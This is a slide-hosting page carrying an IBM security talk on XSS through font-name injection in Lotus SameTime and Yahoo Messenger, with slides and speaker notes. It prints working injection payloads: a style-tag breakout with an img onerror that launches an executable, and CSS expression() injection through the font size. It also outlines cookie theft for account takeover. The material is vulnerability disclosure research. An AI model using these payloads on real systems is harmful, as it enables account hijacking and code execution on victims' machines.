Advanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly DetectionAdvanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly Detection
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
 
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
 
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
 
Observability For You and Me with OpenTelemetry
Observability For You and Me with OpenTelemetryObservability For You and Me with OpenTelemetry
Observability For You and Me with OpenTelemetry
 
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
 
The Evolution of Remote Server Management
The Evolution of Remote Server ManagementThe Evolution of Remote Server Management
The Evolution of Remote Server Management
 
Salesforce AI & Einstein Copilot Workshop
Salesforce AI & Einstein Copilot WorkshopSalesforce AI & Einstein Copilot Workshop
Salesforce AI & Einstein Copilot Workshop
 
How Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdfHow Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdf
 
How to Build a Profitable IoT Product.pptx
How to Build a Profitable IoT Product.pptxHow to Build a Profitable IoT Product.pptx
How to Build a Profitable IoT Product.pptx
 
Pigging Unit Lubricant Oil Blending Plant
Pigging Unit Lubricant Oil Blending PlantPigging Unit Lubricant Oil Blending Plant
Pigging Unit Lubricant Oil Blending Plant
 

Stylish XSS

  • 1. © 2012 IBM Corporation IBM Security Systems 1© 2012 IBM Corporation Stylish XSS via Font Name Injection
  • 2. © 2012 IBM Corporation IBM Security Systems 2 Background - Instant Messengers
  • 3. © 2012 IBM Corporation IBM Security Systems 3 Background - Instant Messengers <Text Style=" font-family:Segoe UI; font-weight:bold; font-style:italic; color:#008000; ">Hi!</Text>
  • 4. © 2012 IBM Corporation IBM Security Systems 4 Background - Instant Messengers Every time I’ve seen this screen, I wondered “What if I could use some HTML here…”
  • 5. © 2012 IBM Corporation IBM Security Systems 5 Background - Windows Fonts Windows accepts basically any character as part of the font name Font name length limited to ~30 chars
  • 6. © 2012 IBM Corporation IBM Security Systems 6 IBM Lotus SameTime Messenger <span style="font-size:14pt;font-family:Segoe UI; font-weight:normal;font-style:normal;">You Do!</span>
  • 7. © 2012 IBM Corporation IBM Security Systems 7 SameTime - Exploit - CSS Font Name: expression(alert(1));
  • 8. © 2012 IBM Corporation IBM Security Systems 8 SameTime - Exploit - CSS Font Name: expression(alert(1)); Desired output: <span style= ";font-family:expression(alert(1));…"> Actual output: <span style="">
  • 9. © 2012 IBM Corporation IBM Security Systems 9 SameTime - Exploit - New Attribute Font Name: "onclick="alert(1)" Desired output: <span style="font-size:9pt;font-family:“ onclick="alert(1)" ..."> Actual output: <span style="font-size:9pt;font-family:" onclick="">
  • 10. © 2012 IBM Corporation IBM Security Systems 10 SameTime - Exploit ~50 Fonts Later
  • 11. © 2012 IBM Corporation IBM Security Systems 11 SameTime - Exploit - Found Message sent: <span style=“…font-family: Message Received: <span style=“…font-family:
  • 12. © 2012 IBM Corporation IBM Security Systems 12 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:
  • 13. © 2012 IBM Corporation IBM Security Systems 13 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:e0”> <img x='>
  • 14. © 2012 IBM Corporation IBM Security Systems 14 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS"> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  • 15. © 2012 IBM Corporation IBM Security Systems 15 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  • 16. © 2012 IBM Corporation IBM Security Systems 16 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span>
  • 17. © 2012 IBM Corporation IBM Security Systems 17 SameTime – Remote Code Execution <span style="font-size:14pt;font-family:e0"> <img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:windowssystem32calc.exe"'</span>
  • 18. © 2012 IBM Corporation IBM Security Systems 18 Yahoo Messenger
  • 19. © 2012 IBM Corporation IBM Security Systems 19 Yahoo Messenger – Message View Lots of Colors, but that’s about it…
  • 20. © 2012 IBM Corporation IBM Security Systems 20 Yahoo Messenger - History View
  • 21. © 2012 IBM Corporation IBM Security Systems 21 Yahoo Messenger - History View
  • 22. © 2012 IBM Corporation IBM Security Systems 22 Yahoo Messenger - History View Finally, Yahoo's purple alert!
  • 23. © 2012 IBM Corporation IBM Security Systems 23 Yahoo Messenger - The Payload <img src="x"onmouseover="alert(1)">
  • 24. © 2012 IBM Corporation IBM Security Systems 24 Yahoo Messenger - Digging Deeper Wait, what? It's not local?!
  • 25. © 2012 IBM Corporation IBM Security Systems 25 Yahoo Messenger - Digging Deeper Accessing this URL in Chrome, yields the same result.
  • 26. © 2012 IBM Corporation IBM Security Systems 26 Yahoo Messenger - Digging Deeper That means I can read the cookie! And steal your account!
  • 27. © 2012 IBM Corporation IBM Security Systems 27 Yahoo Messenger - Recap 1. Send the victim a message that contain malicious HTML snippet 2. Wait 3-4 hours for it to show up in the history 3. Convince the user to access his history or send him a direct link to it (after all, it not local) 4. Have the victim click the Instant Message from the drop-down box
  • 28. © 2012 IBM Corporation IBM Security Systems 28 Yahoo Messenger - Introducing: Web Messenger! Finally I can see the results of my attacks in real time!
  • 29. © 2012 IBM Corporation IBM Security Systems 29 Yahoo Messenger - Web Messenger During the tests, I noticed that a <Font> tag sent as part of the message text, is being rendered differently in the Web Messenger. • The message: <font face="xxx" size="20">33333</font> • Was rendered as: <font style="font-size:20pt" face="xxx“ id="yui_3_2_0_20_1330267588862427">33333</font>
  • 30. © 2012 IBM Corporation IBM Security Systems 30 Yahoo Messenger - Exploiting CSS Add a new rule with an expression() call.
  • 31. © 2012 IBM Corporation IBM Security Systems 31 Yahoo Messenger - Exploiting CSS Started With: <font face=ssss size="1&color:red">xxxx</font> To my surprise the response came back as I hoped <font style="font-size:1&amp;color:red" >xxxx</font>
  • 32. © 2012 IBM Corporation IBM Security Systems 32 Yahoo Messenger - Exploiting CSS Next was the expression: <font face=sssss size="1&color:expression(alert(1))" >xxxx</font> And again, it seems like nothing is filtering this... <font style="font-size:1&amp;color:expression(alert(1))" >xxxx</font>
  • 33. © 2012 IBM Corporation IBM Security Systems 33 Yahoo Messenger - Exploiting CSS Time to open Internet Explorer!
  • 34. © 2012 IBM Corporation IBM Security Systems 34 Yahoo Web Messenger - IE Version
  • 35. © 2012 IBM Corporation IBM Security Systems 35 Yahoo Web Messenger - IE Version The Rules (for IE): 1. The Size attribute must be surrounded by double-quotes (" ") 2. The size value must be followed by the "pt;" suffix <font size="15pt;"> <font style="font-size=15pt;">
  • 36. © 2012 IBM Corporation IBM Security Systems 36 Yahoo Web Messenger - IE Version By tweaking the size value, a new Font-Family CSS rule could be injected. <font size="15pt;font-family:aaaa;"> <font style="font-size=15pt;font-family: aaaa;">
  • 37. © 2012 IBM Corporation IBM Security Systems 37 Yahoo Web Messenger - IE Version With all that in mind, and ~30 <Font> tags later, came the following payload that bypass the CSS filtering <font size="15pt;font-family:expression(alert(1));">
  • 38. © 2012 IBM Corporation IBM Security Systems 38 Yahoo Web Messenger - IE Version It should work correctly according to the rendered source in IE Developer Tools
  • 39. © 2012 IBM Corporation IBM Security Systems 39 Yahoo Web Messenger - IE Version Yet somehow, no alert
  • 40. © 2012 IBM Corporation IBM Security Systems 40 Yahoo Web Messenger - Uber Meta! After ~5 hours of more fiddling and long lonely IM chats with myself I finally found out what I was afraid of. Or in other words, The "No Expression For You" Meta Tag <meta http-equiv="X-UA-Compatible" content="IE=8"/>
  • 41. © 2012 IBM Corporation IBM Security Systems 41 Yahoo Web Messenger - Going Old School Fired up my Windows XP VM and kicked out IE8
  • 42. © 2012 IBM Corporation IBM Security Systems 42 Yahoo Web Messenger - Finally
  • 43. © 2012 IBM Corporation IBM Security Systems 43 Yahoo Messenger - History Window
  • 44. © 2012 IBM Corporation IBM Security Systems 44 Questions?

Editor's Notes

  1. Who am I? This presentation is going to show an idea I had and how I leveraged this idea into 3 vulnerabilities in the major IM clients One of which will not be disclosed today due to the fact that it was not yet patched. It will be publish in our blog once it is patched
  2. Explain how IMs work: Talk about: -------------- The message window is actually a browser The users text message is wrapped in HTML\XML template containing the following fields Message is sent to and then rendered as HTML\XML in the clients browser. Accept parameters dictating: color Font name Font weight Font style And more בואו נדבר על IMS ונשים רגע בצד את כל הפונקציונאליות של וידאו, סאונד שליחת קבצים וכו ונשאיר רק את האספקט של שליחת ההודעות. אם ננסה למפות את הדרכים שלנו לשלוח קלט למערכת, נגיע למשהו כמו בדוגמא
  3. Explain how IMs work: Talk about: -------------- The message window is actually a browser The users text message is wrapped in HTML\XML template containing the following fields Message is sent to and then rendered as HTML\XML in the clients browser. Accept parameters dictating: color Font name Font weight Font style And more בואו נדבר על IMS ונשים רגע בצד את כל הפונקציונאליות של וידאו, סאונד שליחת קבצים וכו ונשאיר רק את האספקט של שליחת ההודעות. אם ננסה למפות את הדרכים שלנו לשלוח קלט למערכת, נגיע למשהו כמו בדוגמא
  4. To configure all these setting, these apps usually come with a screen like this one Every time I’ve seen this screen, I wondered “what if I could use some HTML here…”
  5. And apparently, you can! Windows fonts, All Chars are valid Max 30 chars in every font name
  6. Explain that the font we change, goes into this template and then sent out. Talk about possibilities of exploits: 1. Expression 2. Get out to span tag 3. Get out to HTML main context
  7. Starting off with expression
  8. The server actually filtered everything in the CSS
  9. Moving to the next payload, Getting out of the style attr and getting into a new onclick attr Result in the onclick being empty. No good
  10. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  11. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  12. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  13. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  14. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  15. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  16. Second line shows the trapped CSS in the X parameter Calc executed example
  17. Yahoo No History found in local FS, meaning template is unknown Messages sent takes about 3-4 hours till they register in the History That means that every time I wanted to test anything, I have to wait 3-4 for the results and only then tweak my payloads and resend everything…
  18. Message view seems to sanitize input well, All messages sent managed to do nothing more the pretty colors Taking into account the fact that every test take 3 hours, I decided its best to move on and open the history
  19. Looks a bit better but still, nothing interesting…
  20. The next step I took was to change the history filter to “Instant Messages”
  21. Boom Endless pop ups poped up… Apparently a lot of my tests worked…
  22. I isolated the simplest payload that worked and we can now move on and get some info such as: User Agent Privileges Etc…
  23. Digging deeper got us the browser type (IE) And the location of the page, which is an internet address
  24. So I tried accessing this page using chrome, and as long as I was Logged in to Yahoo! It got me to the same results!
  25. The next thing I found was the cookie Apparently, Yahoo don’t like to use HTTP-only cookies, so once stealing the cookie actually means stealing the account!
  26. Send message Wait 3-4h Social engineer the user into opening the History Have the user click on the Instant Messages context menu
  27. No more 3 hours tests I can now send a message and see it on the web messenger immediately I now know the template.
  28. I sent the first line of code The web messenger rendered the second line of code Changes: Added a new ID attribute – We don’t care! Transformed the Size attribute into a CSS Font-Size attribute – Very Interesting!
  29. First, I tried to inject a new color:red sentence Using the & -> &amp; encoding in order to terminate the css rule and inject a new one And that worked without a glitch
  30. Tried the same with an expression call, and all seems well
  31. Opening IE But no alert… After digging a little deeper
  32. Different sanitizer per browser Found an older message that has a similar behavior Worked in that example till I found some guidelines for the transformation on IE
  33. Talk about the two rules of transformation
  34. Using these guidelines I attempted a new rule injection
  35. Payload found – new rule injected Explain the CSS encoding trick
  36. Everything looks good in IE
  37. Somehow, no alert
  38. Goddamn meta tag But this meta tag doesn’t work in IE<8
  39. VM Kick off IE8
  40. Entered the same URL with IE 7 and the alert shows up
  41. Also in the original History view of the messenger which actually uses the installed IE